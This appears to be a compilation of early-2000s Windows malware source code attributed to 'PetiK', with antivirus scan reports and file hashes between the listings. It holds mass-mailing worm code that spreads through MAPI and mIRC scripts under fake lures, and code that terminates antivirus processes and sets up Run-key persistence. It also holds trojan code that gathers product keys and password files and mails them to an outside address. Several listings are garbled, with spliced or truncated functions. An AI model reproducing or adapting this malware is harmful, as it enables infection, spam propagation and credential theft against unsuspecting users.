db 'C:\progra~1\mirc\script.ini',0
db 'C:\progra~1\mirc32\script.ini',0
@mirc:
pop esi
push 4
pop ecx
mirc_loop:
push ecx
push 0
push 80h
push 2
push 0
push 1
push 40000000h
push esi
api CreateFileA
mov [hmirc],eax
push 0
push offset byte_write
@tmp_mirc:
push e_mirc - s_mirc
push offset s_mirc
push [hmirc]
api WriteFile
push [hmirc]
api CloseHandle
@endsz
pop ecx
loop mirc_loop
end_spread_mirc:
popad
ret
spread_mirc EndP
scan_mail:
xor edx,edx
add esi,21
push edi
p_c: lodsb
cmp al," "
je car_s
cmp al,00h
je f_mail
cmp al,"@"
jne not_a
inc edx
not_a: stosb
jmp p_c
car_s: inc esi
jmp p_c
f_mail: xor al,al
stosb
pop edi
test edx,edx
je d_scan_mail
call send_mail
cmp verif,10
je end_worm
jmp d_scan_mail
send_mail:
inc verif
pushad
@pushsz "MAPI32.DLL"
api LoadLibraryA
xchg ebx,eax
mapi macro x
push offset sz&x
push ebx
api GetProcAddress
mov x,eax
endm
mapi MAPILogon
mapi MAPISendMail
mapi MAPILogoff
mapi_logon:
xor eax,eax
push offset hMAPI
push eax
push eax
push eax
push eax
push eax
call MAPILogon
test eax,eax
jne end_send_mail
mapi_send_mail:
xor eax,eax
push eax
push eax
push offset MsgWrm
push eax
push [hMAPI]
call MAPISendMail
mapi_logoff:
xor eax,eax
push eax
push eax
push eax
push [hMAPI]
call MAPILogoff
push ebx
api FreeLibrary
end_send_mail:
popad
ret
.data
; === copy_worm ===
; === url_info ===

desktop db 50 dup (0)
shelldir db 50 dup (0)
hurl dd ?
; === spread_mirc ===

byte_write dd ?
hmirc dd ?
s_mirc: db '[script]',CRLF
db 'n0=on 1:JOIN:{',CRLF
db 'n1= /if ( $nick == $me ) { halt }',CRLF
db 'n2= /.dcc send $nick '
mircspread db 50 dup (0)
db CRLF,'n3=}',0
e_mirc:
; === spread_wab ===

inet dd 0
wab_path db 100 dup (0)
wab_size dd 100
reg dd 1
verif dd ?
; === scan_mail ===

; === spread_mail ===
szMAPISendMail db "MAPISendMail",0
szMAPILogon db "MAPILogon",0
szMAPILogoff db "MAPILogoff",0
MAPISendMail dd ?
MAPILogon dd ?
MAPILogoff dd ?
hMAPI dd 0
; === gen_mail ===

subjectwrm db "What is the anthrax ?",0
bodywrm db "I send you some informations about Anthrax.",CRLF
db "Click on the attached file.",0
name_mail db "Anthrax_Info.exe",0
mail_from db "support@microsoft.com",0
MsgWrm dd ?
dd offset subjectwrm
dd offset bodywrm
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgToWrm
dd 1
dd offset AttachWrm
MsgFrom dd ?
dd 1
dd offset MsgFrom
dd offset mail_from
dd ?
dd ?
MsgToWrm dd ?
dd 1
dd ?
dd offset mail_addr
dd ?
dd ?
AttachWrm dd ?
dd ?
dd ?
dd offset orig_worm
dd offset name_mail
dd ?
signature db "I-Worm.Anthrax "

end start
end
File Anthrax.exe received on 05.16.2009 10:44:20 (CET)

Authentium 5.1.2.4 2009.05.15 W32/Malware!156f
Avast 4.8.1335.0 2009.05.15 Win32:AntraxInfo
AVG 8.5.0.336 2009.05.15 I-Worm/Petik
BitDefender 7.2 2009.05.16 Generic.Malware.SIg.638D8F0A
CAT-QuickHeal 10.00 2009.05.15 -
ClamAV 0.94.1 2009.05.15 Worm.Petik.1
Comodo 1157 2009.05.08 Worm.Win32.Petik.T
DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.8192
F-Prot 4.4.4.56 2009.05.15 W32/Malware!156f
GData 19 2009.05.16 Generic.Malware.SIg.638D8F0A
McAfee+Artemis 5616 2009.05.15 Artemis!0C6CD035D3C5
Microsoft 1.4602 2009.05.16 Worm:Win32/PetTick@mm
NOD32 4080 2009.05.15 Win32/Petik.T
Panda 10.0.0.14 2009.05.15 W32/Petik
PCTools 4.4.2.0 2009.05.15 I-Worm.Petik.L
Rising 21.29.51.00 2009.05.16 Worm.Anthrax
Sophos 4.41.0 2009.05.16 W32/Petick-A
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 WORM_PET.TICK.S
VBA32 3.12.10.5 2009.05.16 Win32.Worm.Anthrax
VirusBuster 4.6.5.0 2009.05.15 I-Worm.Petik.L
MD5...: 0c6cd035d3c5b84b13d1f54d70bf5fb3
SHA1..: 80bd3e0ec9c6ab27997d7e55d4b0094ebeea26c9
SHA256: 36ee4e185c6b791ae8d38118bd0e00ae3c2135c1bfcd7f3452165a18c96283dc
/*
Name of worm : W32.HLLW.Last
Author : PetiK
Size : 28672 byte
Date : 10/12/2001
Comment : My very first (and last) worm coded in C++ (compiled with Borland).
Why this name ? I decided to stop to code worms and virus. During one year I
learnt many things about worms and virii and I thanks all poeple who helped
me.
*/
#include <stdio.h>
#include <windows.h>
#include <mapi.h>
#include <tlhelp32.h>
#pragma argsused//ne pas générer de fichier listing de compilation
char filename[100];
char windir[100], windr[100];
HKEY hReg;
FILE *htm;
HANDLE infhtm,lSnapshot,myproc;
HWND NAVh;
BOOL rProcessFound;
LPSTR Run = "Software\\Microsoft\\Windows\\CurrentVersion\\Run";
LHANDLE session;
MapiMessage *mess;
HINSTANCE hMAPI;
char messId[512],mname[50],maddr[30];
unsigned long count=0;
BYTE done[50];
DWORD siz=sizeof(done);
DWORD type=REG_SZ;
LPSTR Persona=".DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell
Folders";
SYSTEMTIME syst;
PROCESSENTRY32 uProcess;
WIN32_FIND_DATA ffile;
char *sujet[]={
"New Game for You.",
"Protect your computer against VBS/Worm and VBS/Virus",
"Free Flash Application !",
"Internet Explorer 5.0/6.0 Patch",
"Try WinXP.",
"Free Chat",
};
char *corps[]={
"Hi,\n\nTake a look at this new game found on the web.",
"This tool allows you to protect your computer against the VBS worm/virus.",
"Hi,\n\nVery good application make with Flash 5.",
"There is the last patch for Internet Explorer against the ActiveX's bugs.",
"Run this small program to see a demo of Win XP.",
"Hello,\n\nVery cool program to chat on the net.",
};
char *attachfile[]={
"New_Game.exe",
"Fix_VBSWormVirus.exe",
"Flash_EXE.exe",
"IEPatch.exe",
"Demo_WinXP.exe",
"FreeChat.exe",
};
char *text[]={
"This file is not a Win32 file valid",
"Cannot Open files : It does not appear to be a valid Win32\n\nIf you downloaded the
file, try downloading again.",
"Error with Kernel32 :\nThis program will be terminated.",
"Loader Error :\nThis program will be terminated."
};
void Welcome();
void FuckAntivirus();
void htmfile();
void Spread();
ULONG (PASCAL FAR *RegSerPro)(ULONG, ULONG);

ULONG (PASCAL FAR *mSendMail)(ULONG, ULONG, MapiMessage*, FLAGS, ULONG);
ULONG (PASCAL FAR *mLogoff)(LHANDLE, ULONG, FLAGS, ULONG);
ULONG (PASCAL FAR *mLogon)(ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPLHANDLE);
ULONG (PASCAL FAR *mFindNext)(LHANDLE, ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPTSTR);
ULONG (PASCAL FAR *mReadMail)(LHANDLE, ULONG, LPTSTR, FLAGS, ULONG, lpMapiMessage FAR *);
ULONG (PASCAL FAR *mFreeBuffer)(LPVOID);
WINAPI WinMain(HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow)
{
HMODULE k32=GetModuleHandle("KERNEL32.DLL");
if(k32) {
(FARPROC &)RegSerPro=GetProcAddress(k32,"RegisterServiceProcess");
if(RegSerPro)
RegSerPro(NULL,1);
}
GetModuleFileName(hInst,filename,100);
GetWindowsDirectory((char *)windir,100);
strcpy(windr,windir);
strcat(windir,"\\MSKERN32.EXE");
if ((lstrcmp(filename,windir))!=0) {
Welcome();
}
strcat(windr,"\\MSKern32.exe");
CopyFile(filename,windr,0);
RegOpenKeyEx(HKEY_LOCAL_MACHINE,Run,0,KEY_WRITE,&hReg);
RegSetValueEx(hReg,"MS Kernel32",0,REG_SZ, (BYTE *)windr, 100);
RegCloseKey(hReg);
FuckAntivirus();
GetSystemTime(&syst);
if(syst.wDay==1 && syst.wMonth==12) {
CreateDirectory("C:\\PetiK_Dir",0);
SetCurrentDirectory("C:\\PetiK_Dir");
htm = fopen("petikvx.htm","w");
fprintf(htm,"<html><head><title>The Last From PetiK</title></head>\n");
fprintf(htm,"<body bgcolor=\"blue\" text=\"yellow\">\n");
fprintf(htm,"<p align=\"center\"><font size=\"5\">Win32.HLLW.Last is in your
computer\n");
fprintf(htm,"<p align=\"center\"><font size=\"5\">This my last worm\n");
fprintf(htm,"<p align=\"center\"><font size=\"3\">Greetz to : all3gro, Benny, Bumblebee,
");
fprintf(htm,"Mandragore, ZeMacroKiller98, the 29A group and the [MATRiX] group.\n");
fprintf(htm,"<p align=\"center\"><font size=\"5\">GOOD BYE\n");
fprintf(htm,"</font></p>\n");
fprintf(htm,"</body></html>");
fclose(htm);
ShellExecute(0,"open","petikvx.htm",0,0,SW_SHOWNORMAL);
Sleep(3000);
MessageBox(NULL,"My last worm.\nCoded by PetiK (c)2001","W32.HLLW.Last", MB_OK|
MB_ICONINFORMATION);
}
htmfile();
Sleep(30000);
Spread();
return 0;
}
void Welcome()
{
MessageBeep(MB_ICONHAND);
MessageBox(NULL, text[GetTickCount()&3], filename, MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
}
void FuckAntivirus()
{
register BOOL term;
lSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
uProcess.dwSize=sizeof(uProcess);
rProcessFound=Process32First(lSnapshot,&uProcess);
while(rProcessFound) {
if(strstr(uProcess.szExeFile,"NAVAPW32.EXE")!=NULL) { // Norton Antivirus
myproc=OpenProcess(PROCESS_ALL_ACCESS,FALSE,uProcess.th32ProcessID);
if(myproc!=NULL) {
term=TerminateProcess(myproc,0);
}
CloseHandle(myproc);
}
if(strstr(uProcess.szExeFile,"PAVSCHED.EXE")!=NULL) { // Panda Antivirus
if(myproc!=NULL) {
}
}
rProcessFound=Process32Next(lSnapshot,&uProcess);
}
CloseHandle(lSnapshot);
}
void htmfile()
{
register bool abc=TRUE;
register HANDLE hFile;
register HWND verif;
RegOpenKeyEx(HKEY_USERS,Persona,0,KEY_QUERY_VALUE,&hReg);
RegQueryValueEx(hReg,"Personal",0,&type,done,&siz);
RegCloseKey(hReg);
SetCurrentDirectory(done);
hFile=FindFirstFile("*.ht*",&ffile);
if(hFile!=INVALID_HANDLE_VALUE) {
while(abc) {
WritePrivateProfileString("HTM,HTML Files",ffile.cFileName,"Found by
W32.HLLW.Last","C:\\liste.txt");
abc=FindNextFile(hFile,&ffile);
}
}
FindClose(hFile);
abc=TRUE;
hFile=FindFirstFile("*.doc",&ffile);
while(abc) {
WritePrivateProfileString("DOC Files",ffile.cFileName,"Found by
W32.HLLW.Last","C:\\liste.txt");
}
}
SetFileAttributes("C:\\liste.txt",FILE_ATTRIBUTE_ARCHIVE|FILE_ATTRIBUTE_HIDDEN);
}
void Spread()
{
hMAPI=LoadLibrary("MAPI32.DLL");
(FARPROC &)mLogon=GetProcAddress(hMAPI, "MAPILogon");
(FARPROC &)mLogoff=GetProcAddress(hMAPI, "MAPILogoff");
(FARPROC &)mFindNext=GetProcAddress(hMAPI, "MAPIFindNext");
(FARPROC &)mReadMail=GetProcAddress(hMAPI, "MAPIReadMail");
(FARPROC &)mSendMail=GetProcAddress(hMAPI, "MAPISendMail");
(FARPROC &)mFreeBuffer=GetProcAddress(hMAPI, "MAPIFreeBuffer");
mLogon(NULL,NULL,NULL,MAPI_NEW_SESSION,NULL,&session);
if(mFindNext(session,0,NULL,NULL,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS) {
do {
if(mReadMail(session,NULL,messId,MAPI_ENVELOPE_ONLY|
MAPI_PEEK,NULL,&mess)==SUCCESS_SUCCESS) {
count=(unsigned long)(syst.wMilliseconds*syst.wMinute);
while(count>5)
count=(unsigned long)(count/2);
strcpy(mname,mess->lpOriginator->lpszName);
strcpy(maddr,mess->lpOriginator->lpszAddress);
mess->ulReserved=0;
mess->lpszSubject=sujet[count];
mess->lpszNoteText=corps[count];
mess->lpszMessageType=NULL;
mess->lpszDateReceived=NULL;
mess->lpszConversationID=NULL;
mess->flFlags=MAPI_SENT;
mess->lpOriginator->ulReserved=0;
mess->lpOriginator->ulRecipClass=MAPI_ORIG;
mess->lpOriginator->lpszName=mess->lpRecips->lpszName;
mess->lpOriginator->lpszAddress=mess->lpRecips->lpszAddress;
mess->nRecipCount=1;
mess->lpRecips->ulReserved=0;
mess->lpRecips->ulRecipClass=MAPI_TO;
mess->lpRecips->lpszName=mname;
mess->lpRecips->lpszAddress=maddr;
mess->nFileCount=1;
mess->lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc));
memset(mess->lpFiles, 0, sizeof(MapiFileDesc));
mess->lpFiles->ulReserved=0;
mess->lpFiles->flFlags=NULL;
mess->lpFiles->nPosition=-1;
mess->lpFiles->lpszPathName=filename;
mess->lpFiles->lpszFileName=attachfile[count];
mess->lpFiles->lpFileType=NULL;
mSendMail(session, NULL, mess, NULL, NULL);
count++;
}
}while(mFindNext(session,0,NULL,messId,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS);
free(mess->lpFiles);
mFreeBuffer(mess);
mLogoff(session,0,0,0);
FreeLibrary(hMAPI);
}
}
File Last.exe received on 05.16.2009 17:43:12 (CET)

a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Stopin!IK
AhnLab-V3 5.0.0.2 2009.05.16 Win32/Stopin.worm.28672
AntiVir 7.9.0.168 2009.05.15 Worm/Stopin.B
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Stopin
Authentium 5.1.2.4 2009.05.16 -
Avast 4.8.1335.0 2009.05.15 Win32:Matrix-GoodY
AVG 8.5.0.336 2009.05.15 I-Worm/Petik.T
BitDefender 7.2 2009.05.16 I-Worm.Stopin.B
CAT-QuickHeal 10.00 2009.05.15 I-Worm.Stopin.b
ClamAV 0.94.1 2009.05.16 Worm.Stopin.B
Comodo 1157 2009.05.08 Worm.Win32.Stopin.A
DrWeb 5.0.0.12182 2009.05.16 Win32.HLLM.Petik.59932
eSafe 7.0.17.0 2009.05.14 Win32.Stopin.b
F-Prot 4.4.4.56 2009.05.16 -
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Stopin.b
Fortinet 3.117.0.0 2009.05.16 W32/Stopin.B@mm
GData 19 2009.05.16 I-Worm.Stopin.B
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Stopin
K7AntiVirus 7.10.737 2009.05.16 Email-Worm.Win32.Stopin.b
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Stopin.b
McAfee 5616 2009.05.15 W32/Stopin.a@MM
McAfee+Artemis 5616 2009.05.15 W32/Stopin.a@MM
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Stopin.B
Microsoft 1.4602 2009.05.16 Worm:Win32/Petick.AI@mm
NOD32 4080 2009.05.15 Win32/Stopin.A
Norman 6.01.05 2009.05.16 W32/Stopin.B@mm
nProtect 2009.1.8.0 2009.05.16 Worm/W32.Stopin.28672
Panda 10.0.0.14 2009.05.16 W32/HLLW.Last
PCTools 4.4.2.0 2009.05.16 I-Worm.Petlast.A
Prevx 3.0 2009.05.16 High Risk Worm
Rising 21.29.52.00 2009.05.16 Worm.Mail.Stopin.a
Sophos 4.41.0 2009.05.16 W32/Stall-A
Sunbelt 3.2.1858.2 2009.05.16 Email-Worm.Win32.Stopin.b
TheHacker 6.3.4.1.326 2009.05.15 W32/Stopin.b
TrendMicro 8.950.0.1092 2009.05.15 WORM_PETTICK.Z
VBA32 3.12.10.5 2009.05.16 Win32.HLLW.Last
ViRobot 2009.5.15.1737 2009.05.15 I-Worm.Win32.Stopin.B
VirusBuster 4.6.5.0 2009.05.16 I-Worm.Petlast.A
MD5...: bfce6a179fa853c4c0a5bffc6b8c8f72
SHA1..: 6c8f1623c5471d556003928c15bf670175fc4d3d
/*
Name : Trojan.PetiK
Author : PetiK
Language : C++/ASM
Début : 12 décembre 2001
Fin : 29 décembre 2001
Modifications : 13 janvier 2002
*/
#include <mapi.h>
#pragma argused
#pragma inline
// Install Trojan
char filename[100], sysdir[100], sysdr[100], liste[50], pwl[50];
HKEY hReg;
LPSTR Run = "Software\\Microsoft\\Windows\\CurrentVersion\\Run";
// Fuck antivirus
HANDLE lSnapshot,myproc;
BOOL rProcessFound;
// Prend des informations
BYTE owner[100],org[100],key[30],id[30],ver[30];
BYTE page[150];
DWORD sizowner=sizeof(owner),sizorg=sizeof(org),sizkey=sizeof(key),sizid=sizeof(id);
DWORD sizver=sizeof(ver),sizpage=sizeof(page),type=REG_SZ;
LPSTR
CurVer="Software\\Microsoft\\Windows\\CurrentVersion",Main="Software\\Microsoft\\Internet
Explorer\\Main";
// Envoie les infos
WIN32_FIND_DATA Search;
void Bienvenue();
void StopDetect();
void Information();
void SendInfo();
int WINAPI WinMain(HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow)
{
HMODULE k32=GetModuleHandle("KERNEL32.DLL");
if(k32) {
(FARPROC &)RegSerPro=GetProcAddress(k32,"RegisterServiceProcess");
if(RegSerPro)
RegSerPro(NULL,1);
}
// Install trojan
GetSystemDirectory((char *)sysdir,100);
strcpy(sysdr,sysdir);
strcat(sysdir,"\\SETUP02.EXE");
if ((lstrcmp(filename,sysdir))!=0) {
Bienvenue();
}
else
{
SendInfo();
}
strcat(sysdr,"\\Setup02.exe");
CopyFile(filename,sysdr,0);
RegSetValueEx(hReg,"Microsoft Setup",0,REG_SZ, (BYTE *)sysdr, 100);
RegCloseKey(hReg);
StopDetect();
Information();
void StopDetect()
{
register BOOL term;
if(strstr(uProcess.szExeFile,"NAVAPW32.EXE")!=NULL) { // Norton Antivirus
if(myproc!=NULL) {
}
}
if(strstr(uProcess.szExeFile,"PAVSCHED.EXE")!=NULL) { // Panda Antivirus
if(myproc!=NULL) {
}
}
}
}
void Information()
{
GetSystemDirectory((char *)liste,50);
strcat(liste,"\\liste_troj.txt");
RegOpenKeyEx(HKEY_LOCAL_MACHINE,CurVer,0,KEY_QUERY_VALUE,&hReg);
RegQueryValueEx(hReg,"RegisteredOwner",0,&type,owner,&sizowner);
RegQueryValueEx(hReg,"RegisteredOrganization",0,&type,org,&sizorg);
RegQueryValueEx(hReg,"ProductKey",0,&type,key,&sizkey);
RegQueryValueEx(hReg,"ProductId",0,&type,id,&sizid);
RegQueryValueEx(hReg,"Version",0,&type,ver,&sizver);
RegCloseKey(hReg);
RegOpenKeyEx(HKEY_CURRENT_USER,Main,0,KEY_QUERY_VALUE,&hReg);
RegQueryValueEx(hReg,"Start Page",0,&type,page,&sizpage);
RegCloseKey(hReg);
WritePrivateProfileString("Info Ordi","Owner",owner,liste);
WritePrivateProfileString("Info Ordi","Organization",org,liste);
WritePrivateProfileString("Info Ordi","ProductKey",key,liste);
WritePrivateProfileString("Info Ordi","ProductId",id,liste);
WritePrivateProfileString("Info Ordi","Version",ver,liste);
WritePrivateProfileString("Info Internet","Page Internet",page,liste);
GetWindowsDirectory((char *)pwl,50);
SetCurrentDirectory(pwl);
hFile=FindFirstFile("*.pwl",&Search);
while(abc) {
WritePrivateProfileString("Info Pass",Search.cFileName,pwl,liste);
abc=FindNextFile(hFile,&Search);
}
}
FindClose(hFile);
}
void SendInfo()
{
_asm
{
DebutAsm:
push 50
push offset liste
call @liste
db "\liste_troj.txt",0
@liste: push offset liste
call lstrcat
call @wininetdll
db "WININET.DLL",0
@wininetdll:
call LoadLibrary
test eax,eax
jz send
mov ebp,eax
call @inetconnect
db "InternetGetConnectedState",0
@inetconnect:
push ebp
call GetProcAddress
test eax,eax
jz End
mov edi,eax
verif: push 00h
push offset Tmp
call edi
dec eax
jnz verif
push ebp
call FreeLibrary
send: call @mapidll

db "MAPI32.DLL",0
@mapidll:
call LoadLibrary
test eax,eax
jz End
mov ebp,eax
call @sendmail
db "MAPISendMail",0
@sendmail:
push ebp
call GetProcAddress
test eax,eax
jz End
mov edi,eax
xor eax,eax
push eax
push eax
push offset Message
push eax
push [MsgHdl]
call edi
push 5000
call Sleep
push ebp
call FreeLibrary
End: jmp FinAsm
liste db 50 dup (0)

Tmp dd 0
MsgHdl dd 0
petikmail db "Pentasm99@aol.com",0
subject db "Trojan_PetiK, OUVRE-VITE PETIK",0
body db "Encors un con ki s'est fait prendre",0dh,0ah
db "Tant pis pour lui. Je peux tout voir.",0dh,0ah,0dh,0ah,0dh,0ah
db 9,9,"PetiKVX (www.petikvx.fr.fm)",0
Message dd ?
dd offset subject
dd offset body
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgTo
dd 1
dd offset Attach
MsgFrom dd ?
dd ?
dd ?
dd ?
dd ?
dd ?
MsgTo dd ?
dd 1
dd offset petikmail
dd offset petikmail
dd ?
dd ?
Attach dd ?
dd ?
dd ?
dd offset liste
dd ?
dd ?
FinAsm:
}
RegOpenKeyEx(HKEY_LOCAL_MACHINE,Run,0,KEY_ALL_ACCESS,&hReg);
RegDeleteValue(hReg,"Microsoft Setup");
RegCloseKey(hReg);
}
void Bienvenue()
{
MessageBox(NULL,"Je te souhaite une Bonne et Heureuse Nouvelle Année.\nEt tous mes
meilleurs voeux.",
"BONNE ANNEE !",MB_OK|MB_ICONINFORMATION);
}
File Trojan_PetiK.exe received on 05.16.2009 20:10:19 (CET)

a-squared 4.0.0.101 2009.05.16 -
AhnLab-V3 5.0.0.2 2009.05.16 -
AntiVir 7.9.0.168 2009.05.15 -
Antiy-AVL 2.0.3.1 2009.05.15 -
Authentium 5.1.2.4 2009.05.16 -
Avast 4.8.1335.0 2009.05.15 -
AVG 8.5.0.336 2009.05.15 PSW.Generic.HIF
BitDefender 7.2 2009.05.16 Trojan.PWS.Petilam.A
CAT-QuickHeal 10.00 2009.05.15 -
ClamAV 0.94.1 2009.05.16 -
Comodo 1157 2009.05.08 -
DrWeb 5.0.0.12182 2009.05.16 Trojan.PWS.Petilam
eTrust-Vet 31.6.6508 2009.05.16 -
F-Prot 4.4.4.56 2009.05.16 -
F-Secure 8.0.14470.0 2009.05.16 Trojan-PSW.Win32.Petilam
Fortinet 3.117.0.0 2009.05.16 -
GData 19 2009.05.16 Trojan.PWS.Petilam.A
Ikarus T3.1.1.49.0 2009.05.16 -
K7AntiVirus 7.10.737 2009.05.16 -
Kaspersky 7.0.0.125 2009.05.16 Trojan-PSW.Win32.Petilam
McAfee 5616 2009.05.15 -
Microsoft 1.4602 2009.05.16 PWS:Win32/Petilam
Norman 6.01.05 2009.05.16 -
nProtect 2009.1.8.0 2009.05.16 -
PCTools 4.4.2.0 2009.05.16 Trojan.PWS.Petilam.A
Trojan.Spy.Win32.Undef.GEN
Rising 21.29.52.00 2009.05.16 [Suspicious]
Sophos 4.41.0 2009.05.16 -
Symantec 1.4.4.12 2009.05.16 -
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 TROJ_PETILAM.A
VBA32 3.12.10.5 2009.05.16 Win32.PSW.Petilam
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.16 Trojan.PWS.Petilam.A
MD5...: c12a8711efbf38f0820c827f22269684
SHA1..: 2afd3a9fb4ae7af97c9618b98b87b28894fec2d2
/*
Name : I-Worm.SingLung
Author : PetiK
Date : January 23rd 2002
Language : C++/Win32asm
Terminate some process like AV.

Copy it self to %SYSDIR%\MSGDI32.EXE
Wait an internet connection
Scan some HTML file to find EMail and spread with MAPI functions.
Greetz to Bumblebee (I-Worm.Plage and I-Worm.Rundll);

*/
#include <stdio.h>
#include <mapi.h>
#pragma argused
#pragma inline
char filename[100],sysdir[100],sysdr[100],winhtm[100];
LPSTR Run="Software\\Microsoft\\Windows\\CurrentVersion\\Run",
SHFolder=".DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell
Folders";
int i;
HANDLE fd,lSnapshot,myproc;
BOOL rProcessFound;
FILE *vbs;
BYTE desktop[50],favoris[50],personal[50],cache[50];
DWORD sizcache=sizeof(desktop),sizfavoris=sizeof(favoris),
sizpersonal=sizeof(personal),sizdesktop=sizeof(cache);
DWORD type=REG_SZ;
FILE *stopv;
LHANDLE session;
MapiMessage mess;
MapiRecipDesc from;
HINSTANCE hMAPI;
HKEY hReg;
SYSTEMTIME systime;
HDC dc;
void Welcome();
void StopAV(char *);
void FindFile(char *,char *);
void GetMail(char *,char *);
void sendmail(char *);
void FeedBack();
//ULONG (PASCAL FAR *RegSerPro)(ULONG, ULONG);

int WINAPI WinMain (HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow)
{
/*
// Worm in RegisterServiceProcess
HMODULE kern32=GetModuleHandle("KERNEL32.DLL");
if(kern32) {
(FARPROC &)RegSerPro=GetProcAddress(kern32,"RegisterServiceProcess");
if(RegSerPro)
RegSerPro(NULL,1);
} */
// Fuck some AntiVirus hahahaha

StopAV("AVP32.EXE"); // AVP
StopAV("AVPCC.EXE"); // AVP
StopAV("AVPM.EXE"); // AVP
StopAV("WFINDV32.EXE"); // Dr. Solomon
StopAV("F-AGNT95.EXE"); // F-Secure
StopAV("NAVAPW32.EXE"); // Norton Antivirus
StopAV("NAVW32.EXE"); // Norton Antivirus
StopAV("NMAIN.EXE"); // Norton Antivirus
StopAV("PAVSCHED.EXE"); // Panda AntiVirus
StopAV("ZONEALARM.EXE"); // ZoneAlarm
strcat(sysdr,"\\MSGDI32.EXE");
if((lstrcmp(filename,sysdr))!=0) {
Welcome();
}
else
{
RegOpenKeyEx(HKEY_USERS,SHFolder,0,KEY_QUERY_VALUE,&hReg);
RegQueryValueEx(hReg,"Desktop",0,&type,desktop,&sizdesktop);
RegQueryValueEx(hReg,"Favorites",0,&type,favoris,&sizfavoris);
RegQueryValueEx(hReg,"Personal",0,&type,personal,&sizpersonal);
RegQueryValueEx(hReg,"Cache",0,&type,cache,&sizcache);
RegCloseKey(hReg);
GetWindowsDirectory((char *)winhtm,100);
_asm
{
call @wininet
db "WININET.DLL",0
@wininet:
call LoadLibrary
test eax,eax
jz end_asm
mov ebp,eax
call @inetconnect
@inetconnect:
push ebp
call GetProcAddress
test eax,eax
jz end_wininet
mov edi,eax
verf:
push 0
push Tmp
call edi
dec eax
jnz verf
end_wininet:
push ebp
call FreeLibrary
end_asm:
jmp end_all_asm
Tmp dd 0
end_all_asm:
}
FindFile(desktop,"*.htm");
FindFile(favoris,"*.ht*");
FindFile(personal,"*.ht*");
FindFile(personal,"*.doc");
FindFile(winhtm,".ht*");
FindFile(cache,".ht*");
FreeLibrary(hMAPI);
FeedBack();
}
strcat(sysdir,"\\MsGDI32.exe");
CopyFile(filename,sysdir,FALSE);
RegSetValueEx(hReg,"Microsoft GDI 32 bits",0,REG_SZ,(BYTE *)sysdir,100);
RegCloseKey(hReg);
}
void Welcome()
{
register char fileWel[100],messWel[25],titWel[25];
strcpy(fileWel,filename);
fileWel[0]=0;
for(i=strlen(filename);i>0 && filename[i]!='\\';i--);
wsprintf(titWel,"Error - %s",fileWel+i+1);
wsprintf(messWel,"File - %s - damaged.\nCannot open this file.",fileWel+i+1);
MessageBox(NULL,messWel,titWel,MB_OK|MB_ICONHAND);
}
void StopAV(char *antivirus)

{
register BOOL term;
if(strstr(uProcess.szExeFile,antivirus)!=NULL) { // Norton Antivirus
if(myproc!=NULL) {
}
}
}
}
void FindFile(char *folder, char *ext)

{
char mail[128];
SetCurrentDirectory(folder);
hFile=FindFirstFile(ext,&ffile);
while(abc) {
SetFileAttributes(ffile.cFileName,FILE_ATTRIBUTE_ARCHIVE);
GetMail(ffile.cFileName,mail);
if(strlen(mail)>0) {
WritePrivateProfileString("EMail found",mail,"send","singlung.txt");
sendmail(mail);
}
}
}
}
void GetMail(char *namefile, char *mail)

{
HANDLE hf,hf2;
char *mapped;
DWORD size,i,k;
BOOL test=FALSE,valid=FALSE;
mail[0]=0;
hf=CreateFile(namefile,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIV
E,0);
if(hf==INVALID_HANDLE_VALUE)
return;
size=GetFileSize(hf,NULL);
if(!size)
return;
if(size<8)
return;
size-=100;
hf2=CreateFileMapping(hf,0,PAGE_READONLY,0,0,0);
if(!hf2) {
CloseHandle(hf);
return;
}
mapped=(char *)MapViewOfFile(hf2,FILE_MAP_READ,0,0,0);
if(!mapped) {
CloseHandle(hf2);
CloseHandle(hf);
return;
}
i=0;
while(i<size && !test) {
if(!strncmpi("mailto:",mapped+i,strlen("mailto:"))) {
test=TRUE;
i+=strlen("mailto:");
k=0;
while(mapped[i]!=34 && mapped[i]!=39 && i<size && k<127) {
if(mapped[i]!=' ') {
mail[k]=mapped[i];
k++;
if(mapped[i]=='@')
valid=TRUE;
}
i++;
}
mail[k]=0;
} else
i++;
}
if(!valid)
mail[0]=0;
UnmapViewOfFile(mapped);
CloseHandle(hf2);
CloseHandle(hf);
return;
}
void sendmail(char *tos)

{
memset(&mess,0,sizeof(MapiMessage));
memset(&from,0,sizeof(MapiRecipDesc));
from.lpszName=NULL;
from.ulRecipClass=MAPI_ORIG;
mess.lpszSubject="Secret for you...";
mess.lpszNoteText="Hi Friend,\n\n"
"I send you my last work.\n"
"Mail me if you have some suggests.\n\n"
" See you soon. Best Regards.";
mess.lpRecips=(MapiRecipDesc *)malloc(sizeof(MapiRecipDesc));
if(!mess.lpRecips)
return;
memset(mess.lpRecips,0,sizeof(MapiRecipDesc));
mess.lpRecips->lpszName=tos;
mess.lpRecips->lpszAddress=tos;
